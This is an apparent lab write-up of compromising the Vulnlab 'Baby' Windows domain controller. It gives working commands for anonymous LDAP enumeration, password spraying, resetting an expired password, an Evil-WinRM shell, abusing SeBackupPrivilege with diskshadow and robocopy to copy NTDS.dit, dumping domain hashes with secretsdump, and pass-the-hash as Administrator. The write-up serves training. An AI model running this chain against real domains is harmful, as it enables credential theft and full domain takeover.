9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
52557/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

---- SNIP ----

Information from NMAP scan

• Open DNS, SMB, Kerberos & LDAP ports shows that we are dealing with mostly an AD domain controller
• DNS Computer name confirms that - BabyDC.baby.vl
• We have open RDP and WinRM ports as well, which we can use it later when we get a valid username, password/NTLM hash
• Lets add the IP and host name to the /etc/hosts file

Service Enumeration

SMB

• First step is to test for anonymous login. There are many tools that can be used to test this. E.g.: smbclient, smbmap, netexec (formerly crackmapexec) etc.
• I'm using netexec to test the same

nxc smb 10.10.83.11 -u '' -p '' --shares 

nxc smb 10.10.83.11 -u 'no_such_user' -p '' --shares 

• Anonymous login is not successful and no shares are listed
• If the anonymous login is successful and there are some readable shares listed, Then the next step is to run enum4linux against the target as it can help to obtain some additional information like users, groups, password policy etc.
• Unfortunately we cannot do anything further here. Let's move on to LDAP

LDAP

• First test on LDAP is to check if anonymous bind is allowed, so that we can enumerate users, groups, computers & other AD objects.

nxc ldap BABYDC.baby.vl -u '' -p '' --users | tee tempusers

• User details are obtained. Deleted the unwanted details from the saved file and we have in total 11 users

• Above details are just the names not the actual usernames. We'll use impacket's getADUsers.py script to get the user names.

GetADUsers.py -all baby.vl/ -dc-ip 10.10.83.11                                                                          

• we could see that there are only 8 users listed here , but we have got 11 users when we enumerated through netexec.
• Nevertheless we know the format of the usernames here - [firstname].[lastname]
• Let's add the missing usernames Ian.Walker,Caroline.Robinson & Administrator and create a list
• net exec's ldap has several modules that we can use to enumerate the domain objects further with anonymous login

• First few modules on the list are not interesting at the moment as we are looking for hints about credentials.
• Right now, Potential entry points can be obtained from the description of the user objects, AS-REP roastable users, where we can get the hash and crack it offline to get a valid credentials or password bruteforce with the users list available
• We'll start with enumerating the user's description

nxc ldap BabyDC.baby.vl -u '' -p '' -d baby.vl -M get-desc-users                                                        

• we got information about the initial password of Teresa.Bell present in the description
• Upon testing, it happens to be an invalid credential.

• Lets spray the password on all the users.

• Still no valid credentials, but the user Caroline.Robinson 's logon status is STATUS_PASSWORD_MUST_CHANGE.
• The account is marked to indicate that the password must be changed on the next logon
• It's possible that the password found in the description is the old password

Foothold

Changing Caroline's password

smbpasswd -U baby.vl/Caroline.Robinson -r 10.10.83.11

• Password changed to Password1!
• We'll first verify if the password is successfully changed and it is a success

• Now we have an valid credential, next step is to check the services that Caroline.Robinson has access to, so that we can get a shell
• Always check ssh, rdp, wmi, winrm, mssql services for all the valid credentials obtained as per the open ports
• Here we have only rdp, winrm, wmi ports open, so lets test one by one
• No luck with RDP & WMI, but the user has privileges to use winrm. It can be confirmed by the Pwn3d! keyword against the username

Initial shell access via Evil-WinRm

evil-winrm -i 10.10.83.11 -u 'Caroline.Robinson' -p 'Password1!

• Next step is to do privilege escalation to get Administrator access on the machine
• Quick wins are first to enumerate the user groups & privileges the user has

• Backup Operators group & SeBackupPrivilege draws the attention
• SeBackupPrivilege can be abused to get a copy of NTDS.dit and SYSTEM file which can used to dump the NTLM hashes from DC

Privilege Escalation

• There are various methods present that can be used to abuse SeBackupPrivilege. I'll be using diskshadow method described on https://juggernaut-sec.com/sebackupprivilege/ to obtain the shadow copy of NTDS.dit and SYSTEM files
• diskshadow.exe is an interactive command but we currently have a non-interactive session using evil-winrm. we have to craft a txt file that can be used with diskshadow.exe. This will allow us to execute required commands to create shadow copy

echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii 
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append 
echo "create" | out-file ./diskshadow.txt -encoding ascii -append 
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append

• Create a temp folder on C:/ and run below command to create shadow copy

diskshadow.exe /s C:\Users\Caroline.Robinson\Documents\diskshadow.txt

• Lets copy the SYSTEM and NTDS.dit file using robocopy

Note: Since we are in DC, we are targeting NTDS.dit file. For Standalone machines, SAM must be targeted. The SAM file contains local user hashes, whereas the NTDS.dit file contains all of the domain user hashes

robocopy /b Z:\Windows\system32\Config C:\temp  SYSTEM

robocopy /b Z:\Windows\NTDS\ C:\temp  ntds.dit

• Download it to Kali machine and we can dump the hashes using impacket's secretsdump.py

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

• Use the Administrator's (Domain Admin) NTLM hash to login to the machine

evil-winrm -i 10.10.90.138 -u 'Administrator' -H 'redacted'

Conclusion

Finally we pwned the baby machine from Vulnlab. Key take away's from this machine personally are

• Attention to the minor details during enumeration
• Difference in abusing SeBackupPrivilege between a domain joined and a standalone machine

I know, this is an long post for an easy machine. Tried to add extensive details and screenshots to help the beginners doing their first few boxes. Thank you for sticking till last. Cheers !

References

https://juggernaut-sec.com/sebackupprivilege/
https://learn.microsoft.com/en-us/windows/win32/api/subauth/nf-subauth-msv1_0subauthenticationroutineex
https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap#ldap-anonymous-binds
https://www.n00py.io/2021/09/resetting-expired-passwords-remotely/